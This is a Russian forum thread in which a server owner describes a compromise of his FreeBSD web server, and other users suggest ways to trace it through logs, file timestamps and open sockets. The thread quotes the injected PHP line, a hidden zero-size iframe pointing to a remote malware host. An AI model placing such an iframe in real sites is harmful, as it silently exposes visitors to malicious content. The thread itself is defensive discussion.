Как-то ломанули сервер, помогите понять, как защититься

PB
На сайте с 10.08.2007
Offline
26
PAB
4798

Какая-то гнида ломанула сервер и прописала в index.php всех сайтов, что лежат на сервере вот такую штуку:


echo "<iframe src=\"http://orentraff.cn/in.cgi?18\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>";

Причем по некоторым файлам было видно, что это явно сделано руками.

Когда я первый раз это увидел - поменял все пароли. Не помогло.

Второй раз - увидел в логах что по ssh и по ftp долбятся очень сильно с перебором огромного количества логинов. Но успешных входов вроде бы не было. От греха подальше отключил пока фтп и перенастроил ссш так, чтобы работал только 2й протокол, только для одного юзера только по одному хосту и порту и только с RSA ключом в 2k длинной. И всёравно не помогло. Но уже изгадили не все сайты, а только два.

Кто-то про это что-то знает? Как с этим бороться?

ОС FreeBSD 6.2, ссш - openssh, ftp - proftpd, сервера - апач и nginx сверху, панель - webmin

instamag.ru - классные магнитики из инстаграма (http://instamag.ru?r1=forums&r2=armada)
LEOnidUKG
На сайте с 25.11.2006
Offline
1773
#1

Смотрите логи апатча, наверное где-то валяется шелл.

Никаких подозрительных файлов не появилось?

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
PB
На сайте с 10.08.2007
Offline
26
PAB
#2

в логах апача что именно искать?

Пока подозрительных файлов не находил.

O
На сайте с 13.08.2008
Offline
26
#3
PAB:

Когда я первый раз это увидел - поменял все пароли. Не помогло.
Второй раз - увидел в логах что по ssh и по ftp долбятся очень сильно с перебором огромного количества логинов. Но успешных входов вроде бы не было.

Раз разломали после отключения ftp/ssh - дыра в веб-скриптах. Внимательно смотреть в лог nginx, причем я бы пожалуй начал с изучения метода POST. Посмотрев предварительно mtime заломаных скриптов, и изучал бы именно это промежуток времени.

Хотя замечу, что несколько раз видел вирус, собирающий с клиентских машин параметры ftp и вкрячивающий везде, куда дотянется, похожий iframe.

Outsourcenow.ru: оттюним ваш веб-сервер. 100 млн. запросов в сутки - наш размерчик!
PB
На сайте с 10.08.2007
Offline
26
PAB
#4
Хотя замечу, что несколько раз видел вирус, собирающий с клиентских машин параметры ftp и вкрячивающий везде, куда дотянется, похожий iframe

Это было первой мыслью. К серверу есть доступ только у меня и у партнера. У нас у обоих в фтп клиентах чертова прорва площадок. Все проверили сразу же - везде пусто. На компьютерах тоже.

M
На сайте с 28.02.2006
Offline
236
#5

PAB, смотрите время изменения файлов, в которые код вносится, после чего смотрите логи апача в этот промежуток времени.

PB
На сайте с 10.08.2007
Offline
26
PAB
#6
mihas:
PAB, смотрите время изменения файлов, в которые код вносится, после чего смотрите логи апача в этот промежуток времени.

как-то ничего подозрительного

D
На сайте с 05.06.2007
Offline
155
#7

Подобное скорее не скрипты, а уязвимость в самом сервере, он хоть в обновлённом состоянии поддерживается?

Написал не мало шедевров ;)
PB
На сайте с 10.08.2007
Offline
26
PAB
#8
Dimanych:
Подобное скорее не скрипты, а уязвимость в самом сервере, он хоть в обновлённом состоянии поддерживается?

весь софт обновляется регулярно, саму ось не обновлял

O
На сайте с 13.08.2008
Offline
26
#9
PAB:
весь софт обновляется регулярно, саму ось не обновлял

В 6.2 достаточно давно нашли дырку в бинде, но она вообще говоря очень уж сферическая и в ваккуме.

proftpd авторизуется от системных паролей? Если нет - в нем был (и есть?) жук, при некоторых сочетаниях uid и gid оно не заворачивает пользователей в чрут.

И вообще, посмотрите, кто и что у вас там сокеты слушает, может быть уже закладка живет.

Хотя все-таки более вероятна дыра в каком-нибудь вебмине.

PB
На сайте с 10.08.2007
Offline
26
PAB
#10
Outsourcenow:
В 6.2 достаточно давно нашли дырку в бинде, но она вообще говоря очень уж сферическая и в ваккуме.
proftpd авторизуется от системных паролей? Если нет - в нем был (и есть?) жук, при некоторых сочетаниях uid и gid оно не заворачивает пользователей в чрут.

И вообще, посмотрите, кто и что у вас там сокеты слушает, может быть уже закладка живет.

Хотя все-таки более вероятна дыра в каком-нибудь вебмине.

proftpd я вообще отключил, после этого систему ламали опять

как сокеты посмотреть?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий